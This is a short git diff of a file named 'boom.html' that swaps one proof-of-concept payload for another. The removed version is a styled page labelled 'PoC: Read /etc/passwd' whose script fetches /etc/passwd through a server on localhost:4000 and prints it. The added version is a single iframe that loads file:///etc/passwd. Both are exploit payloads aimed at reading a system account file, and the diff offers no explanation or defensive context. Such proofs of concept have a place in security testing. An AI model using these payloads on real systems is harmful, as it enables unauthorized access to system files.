--- a/boom.html
+++ b/boom.html
@@ -1,25 +1,1 @@
-<!DOCTYPE html>
-<html>
-<head>
-  <title>PoC: Read /etc/passwd</title>
-  <style>
-    body { font-family: monospace; background: #111; color: #0f0; padding: 20px; }
-    pre { white-space: pre-wrap; word-break: break-word; }
-  </style>
-</head>
-<body>
-  <h2>📂 /etc/passwd content from localhost</h2>
-  <pre id="output">Loading...</pre>
-
-  <script>
-    fetch("http://localhost:4000/etc/passwd")
-      .then(r => r.text())
-      .then(text => {
-        document.getElementById("output").textContent = text;
-      })
-      .catch(e => {
-        document.getElementById("output").textContent = "❌ Failed to fetch: " + e;
-      });
-  </script>
-</body>
-</html>
+<iframe src=file:///etc/passwd></iframe>
